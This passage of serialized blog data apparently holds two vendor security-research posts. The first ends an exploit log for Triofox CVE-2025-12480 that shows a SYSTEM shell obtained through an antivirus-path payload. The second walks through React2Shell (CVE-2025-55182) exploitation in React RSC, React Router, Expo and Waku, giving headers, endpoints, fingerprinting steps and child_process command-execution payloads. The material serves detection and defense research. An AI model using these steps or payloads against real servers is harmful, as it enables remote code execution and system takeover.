level=SUCCESS msg=\"The target appears to be a vulnerable version!\" host=10.0.0.68 port=80 vulnerable=yes\ntime=2025-11-25T14:24:17.719-07:00 level=STATUS msg=\"Starting embedded PostgreSQL server\"\ntime=2025-11-25T14:24:17.719-07:00 level=STATUS msg=\"Starting an HTTP server on 10.0.1.10:1337\"\ntime=2025-11-25T14:24:21.268-07:00 level=STATUS msg=\"PostgreSQL server started\"\ntime=2025-11-25T14:24:21.268-07:00 level=STATUS msg=\"Modifying PostgreSQL pg_hba.conf to allow remote connections\"\ntime=2025-11-25T14:24:21.268-07:00 level=STATUS msg=\"Reloading PostgreSQL server config for remote connections\"\ntime=2025-11-25T14:24:26.953-07:00 level=STATUS msg=\"PostgreSQL fully configured\"\ntime=2025-11-25T14:24:26.953-07:00 level=STATUS msg=\"Attempting to access the admin database endpoint with localhost header\"\ntime=2025-11-25T14:24:26.958-07:00 level=STATUS msg=\"Selecting PostgreSQL in database state\"\ntime=2025-11-25T14:24:26.962-07:00 level=STATUS msg=\"Creating new PostgreSQL database\"\ntime=2025-11-25T14:24:39.056-07:00 level=STATUS msg=\"Selecting No AD Option\"\ntime=2025-11-25T14:24:45.110-07:00 level=STATUS msg=\"Creating new local user account\"\ntime=2025-11-25T14:24:45.111-07:00 level=STATUS msg=\"Creating account with the following email and password: mkjva@xmsoq.org:c13b6f587\"\ntime=2025-11-25T14:24:45.119-07:00 level=STATUS msg=\"Following redirect with cookies\"\ntime=2025-11-25T14:24:45.421-07:00 level=STATUS msg=\"Initializing configuration for AD\"\ntime=2025-11-25T14:24:45.423-07:00 level=STATUS msg=\"Following first redirect from creation of AD settings\"\ntime=2025-11-25T14:24:45.710-07:00 level=STATUS msg=\"Following second redirect from checkout and updating cookies\"\ntime=2025-11-25T14:24:46.435-07:00 level=STATUS msg=\"Following redirect to admin console with new cookies\"\ntime=2025-11-25T14:24:47.137-07:00 level=STATUS msg=\"Enabling Home Drive\"\ntime=2025-11-25T14:24:47.436-07:00 level=STATUS msg=\"Creating directory in home drive\"\ntime=2025-11-25T14:24:53.578-07:00 level=STATUS msg=\"Created directory: aLbYFbPvZvFuYD\"\ntime=2025-11-25T14:24:53.578-07:00 level=STATUS msg=\"Creating payload file in home directory\"\ntime=2025-11-25T14:24:57.633-07:00 level=STATUS msg=\"Created file: nsFCZFzFvxHYbbwU.vbs\"\ntime=2025-11-25T14:24:57.651-07:00 level=STATUS msg=\"Created file: IQbneKjteHuZlTxMpe.bat\"\ntime=2025-11-25T14:24:57.651-07:00 level=STATUS msg=\"Setting antivirus scanner to payload\"\ntime=2025-11-25T14:24:57.971-07:00 level=STATUS msg=\"Enable editing AntiVirus settings\"\ntime=2025-11-25T14:24:57.976-07:00 level=STATUS msg=\"Selecting AntiVirus settings to ESET\"\ntime=2025-11-25T14:24:57.980-07:00 level=STATUS msg=\"Setting AntiVirus settings for ESET to our VBS script\"\ntime=2025-11-25T14:24:57.992-07:00 level=STATUS msg=\"Creating file to trigger AV scan. A timeout and error are expected.\"\ntime=2025-11-25T14:24:58.158-07:00 level=SUCCESS msg=\"Received initial connection from 10.0.0.68:49809, entering shell\"\nlast seen: 0ms> whoami\nlast seen: 0ms> 10.0.0.68:49809: nt authority\\system\nexit\ntime=2025-11-25T14:25:05.014-07:00 level=STATUS msg=\"Exit received, shutting down\"\ntime=2025-11-25T14:25:05.016-07:00 level=STATUS msg=\"Shutting down the HTTP Server\"\ntime=2025-11-25T14:25:05.016-07:00 level=STATUS msg=\"C2 server exited\"\ntime=2025-11-25T14:25:28.014-07:00 level=ERROR msg=\"HTTP request error: Put \\\"http:\u002F\u002F10.0.0.68:80\u002Fstorage\u002Fproxiedupload.up\\\": context deadline exceeded (Client.Timeout exceeded while awaiting headers)\"\ntime=2025-11-25T14:25:28.014-07:00 level=ERROR msg=\"Could not retrieve to the home drive endpoint\"\ntime=2025-11-25T14:25:31.718-07:00 level=STATUS msg=\"Attempting to reset the database to default and exit\"\ntime=2025-11-25T14:25:31.718-07:00 level=STATUS msg=\"Attempting to access the admin database endpoint with localhost header\"\ntime=2025-11-25T14:25:52.154-07:00 level=STATUS msg=\"Resetting database to default embedded\"\ntime=2025-11-25T14:25:55.238-07:00 level=STATUS msg=\"Database reset\"\n",[886,21106,21104],{"__ignoreMap":219},[18,21108,21109,21110,21115],{},"In summary, ",[47,21111,21114],{"href":21112,"rel":21113},"https:\u002F\u002Fconsole.vulncheck.com\u002Fcve\u002FCVE-2025-12480",[51],"CVE-2025-12480"," serves as an excellent example of how an exploit that sounds relatively simple in public writeups can turn out to be significantly more complex when accounting for real-world attack paths and solving for non-trivial attacker infrastructure challenges.",[61,21117,202],{"id":201},[18,21119,19423,21120,1246,21123,1255,21126,59],{},[47,21121,19428],{"href":19426,"rel":21122},[51],[47,21124,19432],{"href":13214,"rel":21125},[51],[47,21127,19437],{"href":19435,"rel":21128},[51],[18,21130,1228,21131,1234,21134,1240,21137,1246,21140,1255,21143,1260],{},[47,21132,1233],{"href":10806,"rel":21133},[51],[47,21135,1239],{"href":1237,"rel":21136},[51],[47,21138,1245],{"href":1243,"rel":21139},[51],[47,21141,1251],{"href":1249,"rel":21142},[51],[47,21144,216],{"href":1258,"rel":21145},[51],[2901,21147,21148],{},"html pre.shiki code .ss--_, html code.shiki .ss--_{--shiki-light:#90A4AE;--shiki-default:#24292E;--shiki-dark:#E1E4E8;--shiki-sepia:#F8F8F2}html pre.shiki code .sGXK2, html code.shiki .sGXK2{--shiki-light:#39ADB5;--shiki-default:#D73A49;--shiki-dark:#F97583;--shiki-sepia:#F92672}html pre.shiki code .sKvfc, html code.shiki .sKvfc{--shiki-light:#E2931D;--shiki-light-text-decoration:inherit;--shiki-default:#6F42C1;--shiki-default-text-decoration:inherit;--shiki-dark:#B392F0;--shiki-dark-text-decoration:inherit;--shiki-sepia:#A6E22E;--shiki-sepia-text-decoration:underline}html pre.shiki code .swvn1, html code.shiki .swvn1{--shiki-light:#39ADB5;--shiki-default:#24292E;--shiki-dark:#E1E4E8;--shiki-sepia:#F8F8F2}html pre.shiki code .sD0ED, html code.shiki .sD0ED{--shiki-light:#6182B8;--shiki-default:#6F42C1;--shiki-dark:#B392F0;--shiki-sepia:#A6E22E}html pre.shiki code .siCPE, html code.shiki .siCPE{--shiki-light:#39ADB5;--shiki-default:#032F62;--shiki-dark:#9ECBFF;--shiki-sepia:#E6DB74}html pre.shiki code .sLACW, html code.shiki .sLACW{--shiki-light:#91B859;--shiki-default:#032F62;--shiki-dark:#9ECBFF;--shiki-sepia:#E6DB74}html pre.shiki code .sRxSC, html code.shiki .sRxSC{--shiki-light:#39ADB5;--shiki-light-font-style:italic;--shiki-default:#D73A49;--shiki-default-font-style:inherit;--shiki-dark:#F97583;--shiki-dark-font-style:inherit;--shiki-sepia:#F92672;--shiki-sepia-font-style:inherit}html pre.shiki code .s8HiA, html code.shiki .s8HiA{--shiki-light:#FF5370;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#AE81FF}html pre.shiki code .ss7Ak, html code.shiki .ss7Ak{--shiki-light:#90A4AE;--shiki-light-font-style:italic;--shiki-default:#6A737D;--shiki-default-font-style:inherit;--shiki-dark:#6A737D;--shiki-dark-font-style:inherit;--shiki-sepia:#88846F;--shiki-sepia-font-style:inherit}html pre.shiki code .srJo8, html code.shiki .srJo8{--shiki-light:#9C3EDA;--shiki-light-font-style:inherit;--shiki-default:#D73A49;--shiki-default-font-style:inherit;--shiki-dark:#F97583;--shiki-dark-font-style:inherit;--shiki-sepia:#66D9EF;--shiki-sepia-font-style:italic}html .light .shiki span {color: var(--shiki-light);background: var(--shiki-light-bg);font-style: var(--shiki-light-font-style);font-weight: var(--shiki-light-font-weight);text-decoration: var(--shiki-light-text-decoration);}html.light .shiki span {color: var(--shiki-light);background: var(--shiki-light-bg);font-style: var(--shiki-light-font-style);font-weight: var(--shiki-light-font-weight);text-decoration: var(--shiki-light-text-decoration);}html .default .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html.dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html .sepia .shiki span {color: var(--shiki-sepia);background: var(--shiki-sepia-bg);font-style: var(--shiki-sepia-font-style);font-weight: var(--shiki-sepia-font-weight);text-decoration: var(--shiki-sepia-text-decoration);}html.sepia .shiki span {color: var(--shiki-sepia);background: var(--shiki-sepia-bg);font-style: var(--shiki-sepia-font-style);font-weight: var(--shiki-sepia-font-weight);text-decoration: var(--shiki-sepia-text-decoration);}",{"title":219,"searchDepth":220,"depth":220,"links":21150},[21151,21152,21153,21154,21155,21156],{"id":20210,"depth":220,"text":20211},{"id":20233,"depth":220,"text":20234},{"id":20305,"depth":220,"text":20306},{"id":20391,"depth":220,"text":20392},{"id":21096,"depth":220,"text":21097},{"id":201,"depth":220,"text":202},"Triofox CVE-2025-12480 exploitation from beginning to end, all sharp edges included.",{"slug":21159},"triofox-exploit-CVE-2025-12480","\u002Fblog\u002Ftriofox-exploit-cve-2025-12480",{"title":10339,"description":21157},"blog\u002Ftriofox-exploit-CVE-2025-12480",[242,1281,1279],"6PSuJVgplVYTGmDWcvqogj7LPXRxVviGaFU3cUc2FGo",{"id":21166,"title":21167,"articles":7,"authors":21168,"body":21171,"date":21746,"description":21747,"extension":234,"image":7,"link":7,"meta":21748,"navigation":237,"path":21750,"seo":21751,"series":7,"stem":21752,"subtype":7,"tags":21753,"__hash__":21754},"blog\u002Fblog\u002Freact2shell-beyond-nextjs.md","What's Next: React2Shell Beyond Next.js",[21169,21170],{"name":13183,"avatar":13184,"link":13185,"linkName":13186},{"name":4410,"avatar":4411,"link":4412,"linkName":4413},{"type":15,"value":21172,"toc":21738},[21173,21176,21179,21193,21196,21200,21203,21222,21232,21235,21239,21246,21255,21261,21267,21289,21294,21298,21301,21311,21316,21320,21327,21332,21336,21342,21347,21351,21354,21358,21370,21373,21377,21402,21413,21419,21424,21428,21431,21438,21445,21455,21466,21469,21475,21478,21481,21484,21490,21501,21504,21509,21513,21519,21522,21529,21535,21542,21549,21552,21558,21565,21586,21597,21607,21620,21623,21626,21635,21642,21655,21658,21663,21667,21670,21702,21704,21721],[263,21174],{":list":21175,"ico":266,"title":20},"[\"Next.js has been a primary target for React2Shell exploitation, but there are various other vulnerable frameworks that are exploitable when React Server components (RSC) is enabled.\",\"VulnCheck has developed exploits for four vulnerable frameworks outside of Next.js: React RSC, React Router, Expo, and Waku.\",\"In this blog, we investigate exploitation patterns for each of the frameworks and the impact of subtle differences on detection and exploitation.\"]",[1920,21177,21167],{"id":21178},"whats-next-react2shell-beyond-nextjs",[18,21180,21181,21182,21186,21187,21192],{},"Since React2Shell (CVE-2025-55182) hit the first week of December, ",[47,21183,21185],{"href":1243,"rel":21184},[51],"VulnCheck’s Initial Access Intelligence (IAI)"," team has been hard at work exploring initial access exploit scenarios to give customers the best possible understanding of both known and likely attack vectors. While Next.js is understandably the focus area for many response teams given its huge deployment footprint, VulnCheck has also verified and developed functional exploits for four additional React2Shell exploit variants that target frameworks beyond Next.js. Most of these other variants require the experimental React Server Components (RSC) functionality to be explicitly enabled (and used in a particular manner), so we wouldn’t expect them to present the same type of ready-to-go attack surface that default ",[47,21188,21191],{"href":21189,"rel":21190},"http:\u002F\u002FNext.js",[51],"Next.js"," applications offered. Still, we believe it’s worth considering additional remote attack vectors, even if they don’t have the scale and broad appeal of vulnerable Next.js apps.",[18,21194,21195],{},"In this blog, we will look at React2Shell exploit variants that have been paid much less attention — and in some cases, virtually no attention at all.",[993,21197,21199],{"id":21198},"additional-frameworks","Additional Frameworks",[18,21201,21202],{},"The original React disclosure blog on CVE-2025-55182 notes that a number of different frameworks are vulnerable, including but not limited to Next.js:",[22,21204,21205,21207,21210,21213,21216,21219],{},[25,21206,21191],{},[25,21208,21209],{},"Vite RSC plugin",[25,21211,21212],{},"Parcel RSC plugin",[25,21214,21215],{},"React Router RSC preview",[25,21217,21218],{},"RedwoodSDK",[25,21220,21221],{},"Waku",[18,21223,21224,21227,21228,21231],{},[47,21225,21191],{"href":21189,"rel":21226},[51]," certainly offered the largest attack surface area, but once a public exploit targeting ",[47,21229,21191],{"href":21189,"rel":21230},[51]," applications was out, the rest of the frameworks seemed to fall by the wayside in the industry discourse on this vulnerability. The VulnCheck research team spent some time assessing these less-examined frameworks to see what React2Shell exploit variants might need to look like and how we could provide our customers with specific coverage for those variants.",[18,21233,21234],{},"The team has broken down each vulnerable framework we have looked at so far, highlighting similarities and differences we found in payload development and fingerprinting patterns. This information is intended to aid others in the community for not only building out their own defense and detection capabilities, but also to offer new insight that can aid organizations in their own investigations into potentially vulnerable frameworks beyond Next.js .",[993,21236,21238],{"id":21237},"react-rsc","React RSC",[18,21240,21241,21242,21245],{},"The React project itself, where CVE-2025-55182 originated, gives a good baseline for understanding how handling is shared across the other frameworks and where exploitable components propagated into the rest of the ecosystem. Unlike Next.js applications that utilize vulnerable RSC functionality by default, the core React RSC functionality requires explicitly usage of RSC in the application in order for it to be exploitable; in other words, RSC has to be a feature of the bundler, or used in ",[886,21243,21244],{},"use server"," directives.",[18,21247,21248,21249,21254],{},"We first looked at the ",[47,21250,21253],{"href":21251,"rel":21252},"https:\u002F\u002Fparceljs.org\u002Frecipes\u002Frsc\u002F",[51],"Parcel bundlers RSC integration"," and set up a small demo application from the project's example repositories. The requests to the RSC endpoint may look familiar to those who have analyzed React2Shell internals:",[68,21256],{"src":21257,"alt":21258,"className":21259},"\u002Fblog\u002Freact2shell-beyond-nextjs\u002F1-light.png","Image 1",[10876,21260],"dark:hidden",[68,21262],{"src":21263,"alt":21258,"className":21264},"\u002Fblog\u002Freact2shell-beyond-nextjs\u002F1.png",[21265,21266],"hidden","dark:block",[18,21268,21269,21270,21273,21274,21277,21278,21281,21282,21284,21285,21288],{},"There are few things that stand out in the request that do not match Next.js exploitation patterns. The primary request differences relate to the ",[886,21271,21272],{},"rsc-action-id"," header and the ",[886,21275,21276],{},"$ACTION_ID"," variable that share the generated variable name, in this case ",[886,21279,21280],{},"a13z6#createTodo",". Modification of the body ",[886,21283,21276],{}," changes some of the internal paths, but doesn’t always seem to be required to hit the known code paths. The same cannot be said for modification of the ",[886,21286,21287],{},"rsc-action-id,"," which if modified on our Parcel-built app throws the following error:",[68,21290],{"src":21291,"alt":21292,"className":21293},"\u002Fblog\u002Freact2shell-beyond-nextjs\u002F2-light.png","Image 2",[10876,21260],[68,21295],{"src":21296,"alt":21292,"className":21297},"\u002Fblog\u002Freact2shell-beyond-nextjs\u002F2.png",[21265,21266],[18,21299,21300],{},"From our testing with other bundlers and applications, that header is always required to correspond to a function on the server. While this might seem like an issue from an attacker's perspective, as it may be difficult to identify who is using the RSC integration, there are client-side effects of utilizing RSC functions that appear to have been largely missed in public analysis of React2Shell: the clients serve generated blobs on pages with client RSC integration that are fingerprintable.",[18,21302,21303,21304,21306,21307,21310],{},"For the Parcel app, the client gets sent a set of JavaScript blocks containing the ",[886,21305,21280],{}," variables; these also contain an easy-to-fingerprint ",[886,21308,21309],{},"self.__FLIGHT_DATA"," variable, such as this truncated example we see from visiting our applications page:",[68,21312],{"src":21313,"alt":21314,"className":21315},"\u002Fblog\u002Freact2shell-beyond-nextjs\u002F3-light.png","Image 3",[10876,21260],[68,21317],{"src":21318,"alt":21314,"className":21319},"\u002Fblog\u002Freact2shell-beyond-nextjs\u002F3.png",[21265,21266],[18,21321,21322,21323,21326],{},"An additional fingerprint is left behind if the application uses form data, and that can be seen being rendered directly in the HTML ",[886,21324,21325],{},"form"," element name:",[68,21328],{"src":21329,"alt":21330,"className":21331},"\u002Fblog\u002Freact2shell-beyond-nextjs\u002F4-light.png","Image 4",[10876,21260],[68,21333],{"src":21334,"alt":21330,"className":21335},"\u002Fblog\u002Freact2shell-beyond-nextjs\u002F4.png",[21265,21266],[18,21337,21338,21339,21341],{},"The combination of these two gives us all we need to effectively copy and paste payloads from the other React2Shell exploits. In our exploitation experiments, we simply modified our exploits to search the HTML for the action ID forms — or, if those were not available, we extracted the Flight data variables from the functions and applied those to the ",[886,21340,21272],{}," header:",[68,21343],{"src":21344,"alt":21345,"className":21346},"\u002Fblog\u002Freact2shell-beyond-nextjs\u002F5-light.png","Image 5",[10876,21260],[68,21348],{"src":21349,"alt":21345,"className":21350},"\u002Fblog\u002Freact2shell-beyond-nextjs\u002F5.png",[21265,21266],[18,21352,21353],{},"Based on our analysis, this means that attackers do have a relatively low-touch way to enumerate functions when they correspond to the React RSC integration, which may allow attackers who can reach these functions to fingerprint potential victims and automate exploitation steps.",[993,21355,21357],{"id":21356},"react-router","React Router",[18,21359,21360,21361,21366,21367,21369],{},"The React Router project also contains ",[47,21362,21365],{"href":21363,"rel":21364},"https:\u002F\u002Freactrouter.com\u002Fhow-to\u002Freact-server-components",[51],"experimental support for RSC",", which requires explicitly enabling the RSC integration via RSC Framework Mode. Based on our testing and canary development, it appears that enabling RSC Framework Mode inherits the requirement that ",[886,21368,21272],{}," headers be set, but luckily (for attackers) it doesn’t seem like that value has to correlate with an actual set value to reach the vulnerable sink.",[18,21371,21372],{},"This means that a vulnerable React Router application will just need any action ID header value set and it will be exploitable by the same payload values as the React RSC and Next.js.",[993,21374,21376],{"id":21375},"expo","Expo",[18,21378,21379,21380,21385,21386,21389,21390,21393,21394,21397,21398,21401],{},"The Expo framework ",[47,21381,21384],{"href":21382,"rel":21383},"https:\u002F\u002Fdocs.expo.dev\u002Fguides\u002Fserver-components\u002F",[51],"also includes"," experimental support for RSC that requires explicitly enabling the RSC integration with a ",[886,21387,21388],{},"reactServerFunctions"," flag. Once that flag is enabled and RSC is built into a client endpoint, it appears at first that the Expo project generates its HTML document in a similar way to the core React RSC integration; but as it turns out, Expo bundles the RSC client-facing JavaScript functions into an ",[886,21391,21392],{},"entry.bundle"," file that is accessible from ",[886,21395,21396],{},"\u002Fnode_modules\u002Fexpo-router\u002Fentry.bundle?platform=web",". The platform variable does appear to be required, but ",[886,21399,21400],{},"web"," was consistent in our testing. That bundle resource contains all the RSC function calls.",[18,21403,21404,21405,21408,21409,21412],{},"The requests to the Expo RSC functionality quickly diverge from the vanilla RSC integration by requiring that each of the function calls goes to a specific path in place of the header value. For example, our test application would send RSC values to ",[886,21406,21407],{},"\u002F_flight\u002Fweb\u002FACTION_.\u002Ffunctions\u002Frender-home.tsx\u002FrenderHomeAsync.txt"," and would set the ",[886,21410,21411],{},"expo-platform"," header to match the platform sent in the retrieved bundle. The requests to those endpoints then allow for usage of the same payloads as with the previous frameworks.",[18,21414,21415,21416,21418],{},"Fully automated exploitation is possible on Expo by combining the consistent path for ",[886,21417,21392],{},", the extraction of functions to predictable path formats, and the known headers:",[68,21420],{"src":21421,"alt":21422,"className":21423},"\u002Fblog\u002Freact2shell-beyond-nextjs\u002F6-light.png","Image 6",[10876,21260],[68,21425],{"src":21426,"alt":21422,"className":21427},"\u002Fblog\u002Freact2shell-beyond-nextjs\u002F6.png",[21265,21266],[993,21429,21221],{"id":21430},"waku",[18,21432,21433,21437],{},[47,21434,21221],{"href":21435,"rel":21436},"https:\u002F\u002Fwaku.gg\u002F",[51]," markets itself as a “Minimal React framework”, since like these other targets Waku is of course, a React framework that supports RSC to facilitate server-side rendering. You don’t have to look far on their homepage to figure this out, either — one of the first things mentioned after “Getting started” is the rendering that Waku offers, via RSC.",[18,21439,21440,21441,21444],{},"Spinning up a test target for this one is simple; in their getting started guide, the project developers show a one-liner to quickly stand up a test project using ",[886,21442,21443],{},"npm create waku@latest",". Of course if you were to use this exact version today, you would get a project running a patched version of React on the back end. While it’s great that they’ve patched it all up, we obviously need an unpatched version.",[18,21446,21447,21448,21451,21452,59],{},"Running ",[886,21449,21450],{},"npm view create-waku versions"," should give you a list of viable candidates, and you can just pick an older one. We used ",[886,21453,21454],{},"npm create waku@0.12.4-0.26.0-alpha.2-0",[18,21456,21457,21458,21461,21462,21465],{},"When you run that command, it will prompt for a project name: just hit enter, then follow the instructions to ",[886,21459,21460],{},"cd"," into the directory and start it with ",[886,21463,21464],{},"npm run dev,"," which serves the project at port 3000.",[18,21467,21468],{},"What you end up with is a simple page like this:",[18,21470,21471],{},[68,21472],{"alt":21473,"src":21474},"Waku landing page","\u002Fblog\u002Freact2shell-beyond-nextjs\u002Fwaku-landing.png",[18,21476,21477],{},"So now that it is up and running, we just need to see what is going on behind the scenes to get us a starting point to start trying to “port” the React2Shell exploit to this target.",[18,21479,21480],{},"We hook up the browser to BurpSuite and do a “Hard-Refresh” on the page, then click on the “About page” link since that is about the only thing you can do here.",[18,21482,21483],{},"Nothing interesting appears to happen, but looking at the BurpSuite log you can see a particularly interesting request that went across when we clicked on the “About page” link.",[1354,21485,21488],{"className":21486,"code":21487,"language":1359},[1357],"GET \u002FRSC\u002FR\u002Fabout.txt?query= HTTP\u002F1.1\nHost: localhost:3000\nUser-Agent: Mozilla\u002F5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko\u002F20100101 Firefox\u002F135.0\nAccept: *\u002F*\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate, br\nReferer: http:\u002F\u002Flocalhost:3000\u002F\nX-Waku-Router-Skip: [\"page:\u002F\",\"layout:\u002F\",\"root\",\"route:\u002F\"]\nDNT: 1\nSec-GPC: 1\nConnection: keep-alive\nCookie: sessionId=fdce4ef9-83f1-44c7-aa10-0d61849ce6ee\nSec-Fetch-Dest: empty\nSec-Fetch-Mode: cors\nSec-Fetch-Site: same-origin\nPriority: u=0\n",[886,21489,21487],{"__ignoreMap":219},[18,21491,21492,21493,21496,21497,21500],{},"It’s right there in the URL, ",[886,21494,21495],{},"\u002FRSC\u002F",", and that same ",[886,21498,21499],{},".txt"," file extension that was also present in the Expo framework.",[18,21502,21503],{},"So this feels like a solid starting point. Like the other payloads, we will change the GET to POST and then keep the URL and headers that are already present in the site-generated request; here, we also slap in a multipart Content-Type header and a version of the React2Shell payload. This new request ends up looking like this:",[68,21505],{"src":21506,"alt":21507,"className":21508},"\u002Fblog\u002Freact2shell-beyond-nextjs\u002F7-light.png","Image 7",[10876,21260],[68,21510],{"src":21511,"alt":21507,"className":21512},"\u002Fblog\u002Freact2shell-beyond-nextjs\u002F7.png",[21265,21266],[18,21514,21515,21516],{},"You can see the JavaScript “payload” in there: ",[886,21517,21518],{},"console.log(\\“hi there neighbor\\”);",[18,21520,21521],{},"Hitting send on this request causes it to hang, which if recent history is any indication, is exactly what we want.",[18,21523,21524,21525,21528],{},"The terminal running ",[886,21526,21527],{},"npm run dev"," confirms this:",[1354,21530,21533],{"className":21531,"code":21532,"language":1359},[1357],"(.ia) lobsterjerusalem \u002Ftmp\u002Fyy\u002Fwaku-project $ npm run dev\n\n> waku-project@0.0.0 dev\n> waku dev\n\nready: Listening on http:\u002F\u002Flocalhost:3000\u002F\n[vite] connected.\n[vite] connected.\nhi there neighbor\n",[886,21534,21532],{"__ignoreMap":219},[18,21536,21537,21538,21541],{},"At this point we thought we would just slap a ",[886,21539,21540],{},"child_process"," payload into this and call it done.",[18,21543,21544,21545,21548],{},"With a new payload of: ",[886,21546,21547],{},"require(\\\"child_process\\\").exec(\\\"id>\u002Ftmp\u002Fpr00f\\\");"," ready to go, we hit send, expect a hang, and instead get a 500 error.",[18,21550,21551],{},"Looking at the terminal output again, we see a giant bummer:",[1354,21553,21556],{"className":21554,"code":21555,"language":1359},[1357],"ReferenceError: require is not defined\n at Object.eval [as then] (eval at parseModelString \n… snipped for brevity …\n",[886,21557,21555],{"__ignoreMap":219},[18,21559,21560,21561,21564],{},"There’s no ",[886,21562,21563],{},"require()"," call available where we landed.",[18,21566,21567,21568,21571,21572,21574,21575,21578,21579,21582,21583,21585],{},"Now in a previous payload variant that we worked on for Next.js, there was a ",[886,21569,21570],{},"process.mainModule"," which had a ",[886,21573,21563],{}," method. So we employ the same general idea here. You can enumerate the methods available using payloads like ",[886,21576,21577],{},"console.log(Object.getOwnPropertyNames(global\u002Fprocess\u002Fwhatever variable));"," and then check the output in the terminal that is serving Waku. While there may be other candidates, we eventually found ",[886,21580,21581],{},"process.getBuiltinModule()"," to be a viable ",[886,21584,21563],{}," equivalent.",[18,21587,21588,21589,21592,21593,21596],{},"As a result, we swap out the payload for ",[886,21590,21591],{},"console.log(process.getBuiltinModule(\\\"child_process\\\").execSync(\\\"echo A\\\"));"," which prompts our terminal to output ",[886,21594,21595],{},"\u003CBuffer 41 0a>"," a.k.a (“A\\x0a”) — meaning it worked!",[18,21598,21599,21600,21602,21603,21606],{},"There’s one last step, but it would serve readers well to remember we are running this using ",[886,21601,21464],{}," which is dandy for our purposes; others may run it in a production context. Usually with npm projects this ends up being ",[886,21604,21605],{},"npm run start"," but you can look at the “scripts” section of the package.json just to be sure.",[18,21608,21609,21610,21612,21613,21616,21617,21619],{},"Executing ",[886,21611,21605],{}," does result in an error, but one that is easily fixed by first running ",[886,21614,21615],{},"npm run build"," before attempting ",[886,21618,21605],{}," again.",[18,21621,21622],{},"The production version is now running on port 8080, so we just adjust the settings in Burp’s repeater to send it there instead (as well as the host header, for good measure).",[18,21624,21625],{},"We hit send and got a 200 status code in response…and the command failed to execute.",[18,21627,21628,21629,21634],{},"At this point we thought the problem might be related to the header, since that seemed to be a defining factor in the other React2Shell framework targets we tested. We began reading the code on ",[47,21630,21633],{"href":21631,"rel":21632},"https:\u002F\u002Fgithub.com\u002Fwakujs\u002Fwaku",[51],"Waku’s GitHub"," pertaining to header parsing.",[18,21636,21637,21638,21641],{},"Our problem turned out not to be related to the header. In fact, unlike the other frameworks, Waku does not require its own ",[886,21639,21640],{},"X-Waku-Router-Skip"," header at all; we removed the header, but it had no bearing on the success of the exploit.",[18,21643,21644,21645,21647,21648,21650,21651,21654],{},"After a bit more trial and error, we decided to do a light bit of fuzzing on the URL. As it turns out, all that is required to execute the payload in Waku’s “production” context is to ensure that the endpoint does not exist, though it still needs to have the ",[886,21646,21499],{}," extension and be behind the ",[886,21649,21495],{}," path. So in short, ",[886,21652,21653],{},"\u002FRSC\u002F\u003Cany valid URL characters>.txt"," will do the trick as a viable URL for exploitation in both dev and production contexts.",[18,21656,21657],{},"Here is a final functioning payload to end this on:",[68,21659],{"src":21660,"alt":21661,"className":21662},"\u002Fblog\u002Freact2shell-beyond-nextjs\u002F8-light.png","Image 8",[10876,21260],[68,21664],{"src":21665,"alt":21661,"className":21666},"\u002Fblog\u002Freact2shell-beyond-nextjs\u002F8.png",[21265,21266],[18,21668,21669],{},"If it hangs, it has likely executed the provided payload and RCE has been achieved.",[18,21671,21672,21673,21680,10515,21682,1246,21688,1255,21695,59],{},"Additional insight into React2Shell exploitation, PoCs, and payloads can be found in the following blogs: ",[47,21674,21677],{"href":21675,"rel":21676},"https:\u002F\u002Fwww.vulncheck.com\u002Fblog\u002Fcve-2025-55182-react-nextjs",[51],[1131,21678,21679],{},"Critical Vulnerability in React and Next.js (CVE-2025-55182)",[1131,21681,5437],{},[47,21683,21685],{"href":20134,"rel":21684},[51],[1131,21686,21687],{},"Reacting to Shells: React2Shell Variants & the CVE-2025-55182 Exploit Ecosystem",[47,21689,21692],{"href":21690,"rel":21691},"https:\u002F\u002Fwww.vulncheck.com\u002Fblog\u002Freact2shell-canaries",[51],[1131,21693,21694],{},"React2Shell and What Our Canaries See",[47,21696,21699],{"href":21697,"rel":21698},"https:\u002F\u002Fwww.vulncheck.com\u002Fblog\u002Freact2shell-github",[51],[1131,21700,21701],{},"React2Shell Exploits on GitHub",[61,21703,202],{"id":201},[18,21705,20123,21706,1246,21711,1255,21716,59],{},[47,21707,21709],{"href":10789,"rel":21708},[51],[1131,21710,10793],{},[47,21712,21714],{"href":10796,"rel":21713},[51],[1131,21715,10801],{},[47,21717,21719],{"href":19435,"rel":21718},[51],[1131,21720,19437],{},[18,21722,1228,21723,1234,21726,1240,21729,1246,21732,1255,21735,1260],{},[47,21724,1233],{"href":10806,"rel":21725},[51],[47,21727,1239],{"href":1237,"rel":21728},[51],[47,21730,1245],{"href":1243,"rel":21731},[51],[47,21733,1251],{"href":1249,"rel":21734},[51],[47,21736,216],{"href":1258,"rel":21737},[51],{"title":219,"searchDepth":220,"depth":220,"links":21739},[21740,21741,21742,21743,21744,21745],{"id":21198,"depth":1266,"text":21199},{"id":21237,"depth":1266,"text":21238},{"id":21356,"depth":1266,"text":21357},{"id":21375,"depth":1266,"text":21376},{"id":21430,"depth":1266,"text":21221},{"id":201,"depth":220,"text":202},"2025-12-16","VulnCheck's Initial Access Intelligence team analyzes React2Shell CVE-2025-55182 exploitability in frameworks that utilize the vulnerable components outside of Next.js alone, with emphasis on exploitation steps and potential fingerprinting 